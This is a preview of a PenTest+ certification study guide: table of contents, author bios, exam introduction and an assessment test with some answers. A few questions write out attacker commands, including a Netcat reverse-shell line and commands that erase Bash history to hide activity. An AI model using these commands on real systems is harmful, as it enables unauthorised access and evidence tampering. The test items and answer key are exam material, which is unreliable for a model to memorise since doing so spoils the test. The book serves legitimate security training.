CompTIA PenTest+ Study Guide - Mike Chapple - E-Book

Description

Prepare for the CompTIA PenTest+ certification exam and improve your information security job performance with Sybex

In the newly revised third edition of the CompTIA PenTest+ Study Guide: Exam PT0-003, renowned information security professionals Mike Chapple, Rob Shimonski, and David Seidl deliver a comprehensive and up-to-date roadmap to succeeding on the challenging PenTest+ certification exam. Freshly updated to track the latest changes made to Exam PT0-003, the book will prepare you not just for the test, but for your first day at your first or next information security job.

From penetration testing to vulnerability management and assessment, the authors cover every competency tested by the qualification exam. You'll also find:

  • Complimentary access to the Sybex online learning environment, complete with hundreds of electronic flashcards and a searchable glossary of important terms
  • Up-to-date info organized to track the newly updated PT0-003 PenTest+ certification exam
  • Quick reference material and practice tests designed to help you prepare smarter and faster for the test

Succeed on the PT0-003 exam the first time. Grab a copy of CompTIA PenTest+ Study Guide and walk into the test—or your new information security job—with confidence.


Page count: 957

Publication year: 2025


Table of Contents

Cover

Table of Contents

Title Page

Copyright

Dedication

Acknowledgments

About the Authors

About the Technical Editor

Introduction

CompTIA

The PenTest+ Exam

What Does This Book Cover?

CompTIA PenTest+ Certification Exam Objectives

How to Contact the Publisher

Assessment Test

Answers to Assessment Test

Chapter 1: Penetration Testing

What Is Penetration Testing?

Reasons for Penetration Testing

Who Performs Penetration Tests?

The CompTIA Penetration Testing Process

The Cyber Kill Chain

Tools of the Trade

Summary

Exam Essentials

Lab Exercises

Chapter 2: Planning and Scoping Penetration Tests

Summarizing Pre‐engagement Activities

Shared Responsibility Model

Key Legal Concepts for Penetration Tests

Regulatory Compliance Considerations

Penetration Testing Standards and Methodologies

Threat Modeling Frameworks

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 3: Information Gathering

Reconnaissance and Enumeration

Active Reconnaissance and Enumeration

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 4: Vulnerability Scanning

Identifying Vulnerability Management Requirements

Configuring and Executing Vulnerability Scans

Software Security Testing

Developing a Remediation Workflow

Overcoming Barriers to Vulnerability Scanning

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 5: Analyzing Vulnerability Scans

Reviewing and Interpreting Scan Reports

Validating Scan Results

Common Vulnerabilities

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 6: Exploit and Pivot

Exploits and Attacks

Pivoting and Lateral Movement

Exploitation Toolkits and Tools

Exploit Specifics

Leveraging Exploits

Persistence and Evasion

Covering Your Tracks

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 7: Exploiting Network Vulnerabilities

Identifying Exploits

Conducting Network Exploits

Exploiting Windows Services

Identifying and Exploiting Common Services

Wireless Exploits

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 8: Exploiting Physical and Social Vulnerabilities

Exploiting Physical Vulnerabilities

Exploiting Social Vulnerabilities

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 9: Exploiting Application Vulnerabilities

Exploiting Injection Vulnerabilities

Exploiting Authentication Vulnerabilities

Exploiting Authorization Vulnerabilities

Exploiting Web Application Vulnerabilities

Unsecure Coding Practices

Application Testing Tools

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 10: Exploiting Host Vulnerabilities

Attacking Hosts

Credential Attacks and Testing Tools

Remote Access

Attacking Virtual Machines and Containers

Attacking Cloud Technologies

Attacking Mobile Devices

Attacking Artificial Intelligence (AI)

Attacking IoT, ICS, Embedded Systems, and SCADA Devices

Attacking Data Storage

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 11: Reporting and Communication

The Importance of Collaboration and Communication

Recommending Mitigation Strategies

Writing a Penetration Testing Report

Wrapping Up the Engagement

Summary

Exam Essentials

Lab Exercises

Review Questions

Chapter 12: Scripting for Penetration Testing

Scripting and Penetration Testing

Variables, Arrays, and Substitutions

Comparison Operations

String Operations

Flow Control

Input and Output (I/O)

Error Handling

Reusing Code

The Role of Coding in Penetration Testing

Summary

Exam Essentials

Lab Exercises

Review Questions

Appendix A: Answers to Review Questions

Chapter 2: Planning and Scoping Penetration Tests

Chapter 3: Information Gathering

Chapter 4: Vulnerability Scanning

Chapter 5: Analyzing Vulnerability Scans

Chapter 6: Exploit and Pivot

Chapter 7: Exploiting Network Vulnerabilities

Chapter 8: Exploiting Physical and Social Vulnerabilities

Chapter 9: Exploiting Application Vulnerabilities

Chapter 10: Exploiting Host Vulnerabilities

Chapter 11: Reporting and Communication

Chapter 12: Scripting for Penetration Testing

Appendix B: Solution to Lab Exercise

Solution to Activity 5.2: Analyzing a CVSS Vector

Index

End User License Agreement

List of Tables

Chapter 3

TABLE 3.1 Common ports and services

Chapter 5

TABLE 5.1 CVSS attack vector metric

TABLE 5.2 CVSS attack complexity metric

TABLE 5.3 CVSS attack requirements metric

TABLE 5.4 CVSS privileges required metric

TABLE 5.5 CVSS user interaction metric

TABLE 5.6 CVSS confidentiality metrics

TABLE 5.7 CVSS integrity metrics

TABLE 5.8 CVSS availability metrics

TABLE 5.9 CVSS Qualitative Severity Rating Scale

Chapter 6

TABLE 6.1 Metasploit exploit quality ratings

TABLE 6.2 Metasploit search terms

List of Illustrations

Chapter 1

FIGURE 1.1 The CIA triad

FIGURE 1.2 The DAD triad

FIGURE 1.3 CompTIA penetration testing stages

FIGURE 1.4 The Cyber Kill Chain framework

Chapter 2

FIGURE 2.1 A logical dataflow diagram

FIGURE 2.2 Microsoft Shared Responsibility Matrix

Chapter 3

FIGURE 3.1 nslookup for Netflix.com

FIGURE 3.2 WHOIS of 52.41.111.100

FIGURE 3.3 tracert of Netflix.com

FIGURE 3.4 Shodan result from an exposed Cisco device

FIGURE 3.5 Censys IOS host view

FIGURE 3.6 A Google search for passwords.xls

FIGURE 3.7 Zenmap topology view

FIGURE 3.8 Scapy packet crafting for a TCP ping

FIGURE 3.9 ARP query and response

FIGURE 3.10 Nmap scan using OS identification

FIGURE 3.11 Nmap output of a Windows 10 system

FIGURE 3.12 Harvesting emails using Metasploit

FIGURE 3.13 Using the Wayback Machine

FIGURE 3.14 Using recon‐ng

FIGURE 3.15 Using Censys.io

FIGURE 3.16 Using DNSDumpster

FIGURE 3.17 Mapping the attack surface

FIGURE 3.18 Using theHarvester

FIGURE 3.19 Using WiGLE.net

FIGURE 3.20 Using OSINT Framework

Chapter 4

FIGURE 4.1 FIPS 199 Standards

FIGURE 4.2 Qualys asset map

FIGURE 4.3 Configuring a Nessus scan

FIGURE 4.4 Sample Nessus scan report

FIGURE 4.5 Nessus scan templates

FIGURE 4.6 Disabling unused plug‐ins

FIGURE 4.7 Configuring authenticated scanning

FIGURE 4.8 Choosing a scan appliance

FIGURE 4.9 National Cyber Awareness System Vulnerability Summary

FIGURE 4.10 Setting automatic updates in Nessus

FIGURE 4.11 Acunetix web application scan vulnerability report

FIGURE 4.12 Nikto web application scan results

FIGURE 4.13 Nessus web application scanner

FIGURE 4.14 Vulnerability management life cycle

FIGURE 4.15 Qualys scan performance settings

Chapter 5

FIGURE 5.1 Nessus vulnerability scan report

FIGURE 5.2 Qualys vulnerability scan report

FIGURE 5.3 OpenVAS vulnerability scan report

FIGURE 5.4 CVSS 4.0 Calculator

FIGURE 5.5 Scan report showing vulnerabilities and best practices

FIGURE 5.6 Vulnerability trend analysis

FIGURE 5.7 Missing patch vulnerability

FIGURE 5.8 Unsupported operating system vulnerability

FIGURE 5.9 Code execution vulnerability

FIGURE 5.10 FTP cleartext authentication vulnerability

FIGURE 5.11 Debug mode vulnerability

FIGURE 5.12 Outdated SSL version vulnerability

FIGURE 5.13 Insecure SSL cipher vulnerability

FIGURE 5.14 Invalid certificate warning

FIGURE 5.15 DNS amplification vulnerability

FIGURE 5.16 Internal IP disclosure vulnerability

FIGURE 5.17 Inside a virtual host

FIGURE 5.18 SQL injection vulnerability

FIGURE 5.19 Cross‐site scripting vulnerability

Chapter 6

FIGURE 6.1 OpenVAS/Greenbone vulnerability report

FIGURE 6.2 Pivoting

FIGURE 6.3 Distributed Ruby vulnerability

FIGURE 6.4 phpinfo() output accessible

FIGURE 6.5 phpinfo.php output

FIGURE 6.6 The Metasploit console

FIGURE 6.7 Running show exploits in Metasploit

FIGURE 6.8 Selecting an exploit

FIGURE 6.9 Setting module options

FIGURE 6.10 Successful exploit

FIGURE 6.11 Using the command prompt

FIGURE 6.12 WMImplant WMI tools

FIGURE 6.13 CrackMapExec's main screen

FIGURE 6.14 Responder capture flow

FIGURE 6.15 Pass‐the‐hash flow

FIGURE 6.16 John the Ripper

Chapter 7

FIGURE 7.1 Double‐tagged Ethernet packet

FIGURE 7.2 Yersinia 802.1q attack selection

FIGURE 7.3 DNS cache poisoning attack

FIGURE 7.4 ARP spoofing

FIGURE 7.5 Manually configuring a MAC address in Windows 10

FIGURE 7.6 Metasploit SYN flood

FIGURE 7.7 NetBIOS name service attack

FIGURE 7.8 Responder sending poisoned answers

FIGURE 7.9 Responder capturing hashes

FIGURE 7.10 Output from snmpwalk

FIGURE 7.11 THC Hydra SSH brute‐force attack

FIGURE 7.12 WiGLE map showing access point density in a metropolitan area

FIGURE 7.13 RFID cloner and tags

Chapter 8

FIGURE 8.1 A typical security vestibule design

FIGURE 8.2 SET menu

FIGURE 8.3 SET loading the Metasploit reverse TCP handler

FIGURE 8.4 BeEF hooked browser detail

FIGURE 8.5 BeEF commands usable in a hooked browser

Chapter 9

FIGURE 9.1 Web application firewall

FIGURE 9.2 Account number input page

FIGURE 9.3 Account information page

FIGURE 9.4 Account information page after blind SQL injection

FIGURE 9.5 Account creation page

FIGURE 9.6 Zyxel router default password

FIGURE 9.7 Session authentication with cookies

FIGURE 9.8 Session cookie from CNN.com

FIGURE 9.9 Session hijacking with cookies

FIGURE 9.10 Kerberos authentication process

FIGURE 9.11 Example web server directory structure

FIGURE 9.12 Directory scanning with DirBuster

FIGURE 9.13 Message board post rendered in a browser

FIGURE 9.14 XSS attack rendered in a browser

FIGURE 9.15 SQL error disclosure

FIGURE 9.16 Zed Attack Proxy (ZAP)

FIGURE 9.17 Burp Proxy

FIGURE 9.18 Postman

FIGURE 9.19 Wfuzz performing fuzz testing

FIGURE 9.20 Gobuster DNS enumeration

FIGURE 9.21 WPScan WordPress vulnerability scanner

FIGURE 9.22 Scanning a database‐backed application with sqlmap

Chapter 10

FIGURE 10.1 SUID files in Kali

FIGURE 10.2 SUID files with details

FIGURE 10.3 Abusing sudo rights

FIGURE 10.4 Checking Linux kernel version information

FIGURE 10.5 Dumping the Windows SAM with Mimikatz

FIGURE 10.6 Hashcat cracking Linux passwords

FIGURE 10.7 Metasploit reverse TCP shell

FIGURE 10.8 Detecting virtualization on a Windows system

FIGURE 10.9 Detecting virtualization on Kali Linux

FIGURE 10.10 Side‐channel attack against a virtual machine

FIGURE 10.11 A simple SCADA environment design example

Chapter 11

FIGURE 11.1 Smartphone‐based multifactor authentication

Chapter 12

FIGURE 12.1 Identifying the language of a conditional execution statement

FIGURE 12.2 Identifying the language of a for loop

FIGURE 12.3 Identifying the language of a while loop

CompTIA® PenTest+® Study Guide

Exam PT0‐003

Third Edition

Mike Chapple

Robert Shimonski

David Seidl

Copyright © 2025 by John Wiley & Sons, Inc. All rights, including for text and data mining, AI training, and similar technologies, are reserved.

Published by John Wiley & Sons, Inc., Hoboken, New Jersey.

Published simultaneously in Canada and the United Kingdom.

ISBNs: 9781394285006 (paperback), 9781394285020 (ePDF), 9781394285013 (ePub)

No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning, or otherwise, except as permitted under Section 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per‐copy fee to the Copyright Clearance Center, Inc., 222 Rosewood Drive, Danvers, MA 01923, (978) 750‐8400, fax (978) 750‐4470, or on the web at www.copyright.com. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748‐6011, fax (201) 748‐6008, or online at www.wiley.com/go/permission.

The manufacturer’s authorized representative according to the EU General Product Safety Regulation is Wiley‐VCH GmbH, Boschstr. 12, 69469 Weinheim, Germany, e‐mail: [email protected].

Trademarks: WILEY, the Wiley logo, and Sybex are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CompTIA and PenTest+ are trademarks or registered trademarks of The Computing Technology Industry Association, Inc. All other trademarks are the property of their respective owners. John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.

Limit of Liability/Disclaimer of Warranty: While the publisher and authors have used their best efforts in preparing this book, they make no representations or warranties with respect to the accuracy or completeness of the contents of this book and specifically disclaim any implied warranties of merchantability or fitness for a particular purpose. No warranty may be created or extended by sales representatives or written sales materials. The advice and strategies contained herein may not be suitable for your situation. You should consult with a professional where appropriate. Further, readers should be aware that websites listed in this work may have changed or disappeared between when this work was written and when it is read. Neither the publisher nor authors shall be liable for any loss of profit or any other commercial damages, including but not limited to special, incidental, consequential, or other damages.

For general information on our other products and services, please contact our Customer Care Department within the United States at (800) 762‐2974, outside the United States at (317) 572‐ 3993. For product technical support, you can find answers to frequently asked questions or reach us via live chat at https://sybexsupport.wiley.com.

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic formats. For more information about Wiley products, visit our web site at www.wiley.com.

Library of Congress Control Number: 2025930423

Cover image: © Jeremy Woodhouse/Getty Images

Cover design: Wiley

This book is dedicated to Shahla Pirnia, in deepest gratitude for your unwavering dedication and meticulous care, which have shaped so many of my works. Your attention to detail and passion for excellence will always inspire me. May your legacy live on in every word we've crafted together.

— Mike

Acknowledgments

Books like this involve work from many people, and as authors, we truly appreciate the hard work and dedication that the team at Wiley shows. We would especially like to thank Senior Acquisitions Editor Kenyon Brown. We have worked with Ken on multiple projects and consistently enjoy our work with him.

We also greatly appreciated the editing and production team for the book, including Pete Gaughan, managing editor, who made sure everything worked smoothly; Christine O'Connor, our project manager, whose prompt and consistent oversight got this book out the door; and Saravanan Dakshinamurthy, our content refinement specialist, who guided us through layouts, formatting, and final cleanup to produce a great book. We'd also like to thank our technical editor, Rishalin Pillay, who provided us with thought‐provoking questions and technical insight throughout the process. We would also like to thank the many behind‐the‐scenes contributors, including the graphics, production, and technical teams who make the book and companion materials into a finished product.

Our agent, Carole Jelen of Waterside Productions, continues to provide us with wonderful opportunities, advice, and assistance throughout our writing careers.

Finally, we would like to thank our families, friends, and significant others who support us through the late evenings, busy weekends, and long hours that a book like this requires to write, edit, and get to press.

About the Authors

Mike Chapple, PhD, Security+, CISSP, CISA, PenTest+, CySA+, is a teaching professor of IT, analytics, and operations at the University of Notre Dame. He is also the academic director of the University's master's program in business analytics.

Mike is a cybersecurity professional with over 25 years of experience in the field. Prior to his current role, Mike served as senior director for IT service delivery at Notre Dame, where he oversaw the university's cybersecurity program, cloud computing efforts, and other areas. Mike also previously served as chief information officer of Brand Institute and as an information security researcher with the National Security Agency and the U.S. Air Force.

Mike is a frequent contributor to several magazines and websites and is the author or coauthor of more than 50 books, including CISSP Official ISC2 Study Guide (Wiley, 2024), CISSP Official ISC2 Practice Tests (Wiley, 2024), CompTIA Security+ Study Guide (Wiley, 2023), CompTIA CySA+ Study Guide (Wiley, 2023), CompTIA CySA+ Practice Tests (Wiley, 2023), and Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021).

Mike offers free study groups for the PenTest+, CySA+, Security+, CISSP, and other major certifications at his website, http://certmike.com.

Robert Shimonski, CASP+, CySA+, PenTest+, Security+, is a technology executive specializing in health care IT for one of the largest health systems in America. In his current role, Rob is responsible for bringing operational support and incident response into the future with the help of new technologies such as cloud and artificial intelligence. His current focus is on deploying securely to Cloud (Azure, AWS, and Google), DevOps, DevSecOps and AIOps. Rob has spent over 25 years in the technology “trenches” handling networking and security architecture, design, engineering, testing, and development efforts for global projects. A go‐to person for all things security‐related, Rob has been a major force in deploying security‐related systems for many years. Rob also worked for various companies reviewing and developing curriculum as well as other security‐related books, technical articles, and publications based on technology deployment, testing, hacking, pen testing, and many other aspects of security. Rob holds dozens of technology certifications to include 20+ CompTIA certifications, SANS.org GIAC, GSEC, and GCIH as well as many vendor‐based cloud specialized certifications from Google, Microsoft Azure, and Amazon Web Services. Rob is considered a leading expert in prepping others to achieve certification success.

David Seidl, CISSP, PenTest+, is vice president for information technology and CIO at Miami University. During his IT career, he has served in a variety of technical and information security roles, including serving as the senior director for campus technology services at the University of Notre Dame, where he co‐led Notre Dame's move to the cloud and oversaw cloud operations, ERP, databases, identity management, and a broad range of other technologies and services. He also served as Notre Dame's director of information security and led Notre Dame's information security program. He has taught information security and networking undergraduate courses as an instructor for Notre Dame's Mendoza College of Business, and he has written books on security certification and cyberwarfare, including co‐authoring the previous editions of CISSP (ISC)² Official Practice Tests (Sybex, 2018) as well as CISSP Official (ISC)² Practice Tests (Wiley, 2021), CompTIA Security+ Study Guide (Wiley, 2020), CompTIA Security+ Practice Tests (Wiley, 2020), CompTIA CySA+ Study Guide (Wiley, 2020), CompTIA CySA+ Practice Tests (Wiley, 2020), Cybersecurity: Information Operations in a Connected World (Jones and Bartlett, 2021), and CompTIA Security+ Practice Tests: Exam SY0‐601 (Sybex, 2021), as well as other certification guides and books on information security.

David holds a bachelor's degree in communication technology and a master's degree in information security from Eastern Michigan University, as well as CISSP, CySA+, PenTest+, GPEN, and GCIH certifications.

About the Technical Editor

Rishalin Pillay is a seasoned cybersecurity expert with extensive experience in offensive security, cloud security, threat, and incident response, and is recognized as a trusted authority in the field. As an accomplished Pluralsight author, he has created in‐depth courses like Red Team Tools and Threat Protection, and has authored or coauthored influential books such as Learn Penetration Testing (Packt Publishing, 2019), Ethical Hacking Workshop (Packt Publishing, 2023), and Offensive Shellcode from Scratch (Packt Publishing, 2022). Additionally, Rishalin has contributed to numerous publications on topics including dark web analysis, Kali Linux, security operations, and essential study guides for networking and Microsoft technologies. His dedication to advancing the field has earned him prestigious accolades, including the Microsoft Content Publisher Gold and Platinum awards and the Event Speaker Gold award, reflecting his impactful presence as a writer, educator, and Tier‐1 business event speaker. Whether through writing, teaching, or presenting, Rishalin continues to make a lasting impact on the cybersecurity industry.

Introduction

The CompTIA®PenTest+® Study Guide: Exam PT0‐003, Third Edition, provides accessible explanations and real‐world knowledge about the exam objectives that make up the PenTest+ certification. This book will help you to assess your knowledge before taking the exam, as well as provide a stepping‐stone to further learning in areas where you may want to expand your skill set or expertise.

Before you tackle the PenTest+ exam, you should already be a security practitioner. CompTIA suggests that test‐takers should have intermediate‐level skills based on their cybersecurity pathway. You should also be familiar with at least some of the tools and techniques described in this book. You don't need to know every tool, but understanding how to use existing experience to approach a new scenario, tool, or technology that you may not know is critical to passing the PenTest+ exam.

CompTIA

CompTIA is a nonprofit trade organization that offers certification in a variety of IT areas, ranging from the skills that a PC support technician needs, which are covered in the A+ exam, to advanced certifications like SecurityX. CompTIA divides its exams into categories based on the topics they cover, as shown in the following table:

Core                                  Infrastructure                Cybersecurity
Tech+, A+, Network+, Security+        Cloud+, Linux+, Server+       CySA+, SecurityX, PenTest+

CompTIA recommends that practitioners follow a cybersecurity career path that begins with Tech+ and A+ certifications and proceeds to include the Network+ and Security+ credentials to complete the core skills. From there, cybersecurity professionals may choose the PenTest+ and/or Cybersecurity Analyst+ (CySA+) certifications before attempting the SecurityX certification as a capstone credential.

The CySA+ and PenTest+ exams are more advanced exams, intended for professionals with hands‐on experience who also possess the knowledge covered by the prior exams.

CompTIA certifications are ISO/ANAB accredited, and they are used throughout multiple industries as a measure of technical skill and knowledge. In addition, CompTIA certifications, including the Security+ and the SecurityX, have been approved by the U.S. government as Information Assurance baseline certifications and are included in the State Department's Skills Incentive Program.

The PenTest+ Exam

The PenTest+ exam is designed to be a vendor‐neutral certification for penetration testers. It is intended to assess penetration testing engagement, reconnaissance, vulnerability assessment, and attacks and exploits, with a focus on network resiliency testing. Successful test‐takers will prove their ability to plan and scope assessments, handle legal and compliance requirements, perform vulnerability scanning and penetration testing activities using a variety of tools and techniques, and then analyze the results of those activities.

It covers five major domains:

Engagement Management

Reconnaissance and Enumeration

Vulnerability Discovery and Analysis

Attacks and Exploits

Post‐exploitation and Lateral Movement

These five areas include a range of subtopics, from scoping penetration tests to performing host enumeration and exploits, while focusing heavily on scenario‐based learning.

The PenTest+ exam fits between the entry‐level Security+ exam and the SecurityX (formerly CompTIA Advanced Security Practitioner [CASP+]) certification, providing a mid‐career certification for those who are seeking the next step in their certification and career path while specializing in pentesting or vulnerability management.

The PenTest+ exam is conducted in a format that CompTIA calls “performance‐based questions (PBQs).” This means that the exam uses hands‐on simulations using actual security tools and scenarios to perform tasks that match those found in the daily work of a security practitioner. There may be numerous types of exam questions, such as multiple‐choice, fill‐in‐the‐blank, multiple‐response, drag‐and‐drop, and image‐based problems.

CompTIA recommends that test‐takers have three or four years of experience as a penetration tester before taking this exam. As of 2024, the exam costs $404 in the United States, with roughly equivalent prices in other locations around the globe. More details about the PenTest+ exam and how to take it can be found at:

https://www.comptia.org/certifications/pentest

Study and Exam Preparation Tips

A test preparation book like this cannot teach you every possible security software package, scenario, and specific technology that may appear on the exam. Instead, you should focus on whether you are familiar with the type or category of technology, tool, process, or scenario presented as you read the book. If you identify a gap, you may want to find additional tools to help you learn more about those topics.

Additional resources for hands‐on exercises include the following:

  • Exploit-Exercises.com provides virtual machines, documentation, and challenges covering a wide range of security issues at https://exploit-exercises.com.
  • Hacking‐Lab provides capture‐the‐flag (CTF) exercises in a variety of fields at https://hacking-lab.com.
  • The OWASP Hacking Lab provides excellent web application–focused exercises at https://owasp.org/www-project-hacking-lab.
  • PentesterLab provides subscription‐based access to penetration testing exercises at https://pentesterlab.com/exercises.

Since the exam uses scenario‐based learning, expect the questions to involve analysis and thought rather than relying on simple memorization. As you might expect, it is impossible to replicate that experience in a book, so the questions here are intended to help you be confident that you know the topic well enough to think through hands‐on exercises.

Taking the Exam

Once you are fully prepared to take the exam, you can visit the CompTIA website to purchase your exam voucher:

http://store.comptia.org

Currently, CompTIA offers two options for taking the exam: an in‐person exam at a testing center and an at‐home exam that you take on your own computer.

This book includes a coupon that you may use to save 10 percent on your CompTIA exam registration.

In‐Person Exams

CompTIA partners with Pearson VUE's testing centers, so your next step will be to locate a testing center near you. In the United States, you can do this based on your address or your ZIP code, while non‐U.S. test takers may find it easier to enter their city and country. You can search for a test center near you at the Pearson VUE website, where you will need to navigate to “Find a test center.”

https://www.pearsonvue.com/us/en/comptia.html

Now that you know where you'd like to take the exam, simply use the link on that site to set up a testing account and schedule an exam.

On the day of the test, take two forms of identification, and make sure to show up with plenty of time before the exam starts. Remember that you will not be able to take your notes, electronic devices (including smartphones and watches), or other materials in with you.

At‐Home Exams

CompTIA began offering online exam proctoring in 2020 through the OnVUE program. Candidates using this approach will take the exam at their home or office and be proctored over a webcam by a remote proctor. For more information on the at‐home testing option, visit:

https://www.pearsonvue.com/us/en/comptia/onvue.html

The OnVUE platform requires specialized software. Be sure to run the OnVUE system test before you register for an online exam. This will save you problems if your system is not compatible with the software.

After the PenTest+ Exam

Once you have taken the exam, you will be notified of your score immediately, so you'll know if you passed the test right away. You should keep track of your score report with your exam registration records and the email address you used to register for the exam. If you've passed, you'll receive a handsome certificate, similar to the one shown here:

Maintaining Your Certification

CompTIA certifications must be renewed on a periodic basis. To renew your certification, you can either pass the most current version of the exam, earn a qualifying higher‐level CompTIA or industry certification, or complete sufficient continuing education activities to earn enough continuing education units (CEUs) to renew it.

Assessment Test

If you're considering taking the PenTest+ exam, you should have already taken and passed the CompTIA Security+ and Network+ exams or have equivalent experience—typically at least three to four years of experience in the field. You may also already hold other equivalent or related certifications. The following assessment test will help to make sure you have the knowledge that you need before you tackle the PenTest+ certification, and it will help you determine where you may want to spend the most time with this book.

1. Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

A. SQL injection
B. VM escape
C. Buffer overflow
D. Cross‐site scripting

2. What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?

A. An SOW
B. An NDA
C. An MSA
D. A noncompete

3. Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

A. ZAP
B. Nessus
C. SonarQube
D. OllyDbg

4. Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?

A. PowerShell
B. Bash
C. Ruby
D. Python

5. Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

A. Record the details in the penetration testing report.
B. Remediate the vulnerability that allowed her to gain access.
C. Report the potential compromise to the client.
D. No further action is necessary because Renee's scope of work is limited to penetration testing.

6. Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

A. Unknown environment
B. Authenticated
C. Internal view
D. External view

7. Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?

A. history -c
B. kill -9 $$
C. echo "" > /~/.bash_history
D. ln /dev/null ~/.bash_history -sf

8. Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

A. Nmap
B. Nikto
C. Wireshark
D. CeWL

9. Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

A. OSINT
B. HSI
C. Background
D. None of the above

10. Which of the following activities constitutes a violation of integrity?

A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.

11. Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

A. 256
B. 1,000
C. 1,024
D. 65,535

12. Brian is conducting a thorough technical review of his organization's web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

A. Penetration testing
B. Vulnerability scanning
C. Remediation
D. Threat hunting

13. Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

A. Started a reverse shell using Netcat
B. Captured traffic on the Ethernet port to the console via Netcat
C. Set up a bind shell using Netcat
D. None of the above

14. Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

A. A double jump
B. A powerhop
C. Double tagging
D. VLAN squeezing

15. Alaina wants to conduct an on‐path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

A. ARP spoofing
B. IP proofing
C. DHCP pirating
D. Spoofmastering

16. Michael's social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

A. Authority
B. Scarcity
C. Likeness
D. Social proof

17. Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on‐site via the network?

A. Shoulder surfing
B. Kerberoasting
C. USB key drop
D. Quid pro quo

18. Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

A. An encrypted file
B. A hashed file
C. A SUID file
D. A SIP file

19. Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

A. Nmap
B. Traceroute
C. regmon
D. Whois

20. Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?

A. Run systemd-detect-virt.
B. Run ls -l /dev/disk/by-id.
C. Run wmic baseboard to get manufacturer, product.
D. Run dmidecode to retrieve hardware information.

Answers to Assessment Test

1. B. Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You'll learn more about all of these vulnerabilities in Chapters 5 and 9.

2. B. A nondisclosure agreement (NDA) is a legal agreement that is designed to protect the confidentiality of the client's data and other information that the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement, an MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work), and noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends. You'll learn more about the legal documents that are part of a penetration test in Chapter 2.

3. A. The Zed Attack Proxy (ZAP) from the Open Worldwide Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. Nessus is a vulnerability scanner that you'll learn more about in Chapter 4. SonarQube is a static, not dynamic, software testing tool, and OllyDbg is a debugger. You'll learn more about these tools in Chapter 9.

4. B. The .sh file extension is commonly used for Bash scripts. PowerShell scripts usually have a .ps1 extension. Ruby scripts use the .rb extension, and Python scripts end with .py. You'll learn more about these languages in Chapter 12.

5. C. When penetration testers discover indicators of an ongoing or past compromise, they should immediately inform management and recommend that the organization activate its cybersecurity incident response process. You'll learn more about reporting and communication in Chapter 11.

6. B. An authenticated, or credentialed, scan provides the most detailed view of the system. Unknown environment assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow. You'll learn more about authenticated scanning in Chapter 4.

7. D. Although all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything. Chapters 6 and 10 cover compromising hosts and hiding your tracks.

8. B. It's very important to know the use and purpose of various penetration testing tools when taking the PenTest+ exam. Nikto is the best tool to meet Kaiden's needs in this scenario, since it is a dedicated web application scanning tool. Nmap is a port scanner, and Wireshark is a packet analysis tool. The Custom Wordlist Generator (CeWL) is used to spider websites for keywords. None of the latter three tools perform web application security testing. You'll learn more about Nikto in Chapter 4.

9. A. OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test. Chapter 3 covers OSINT in more detail.

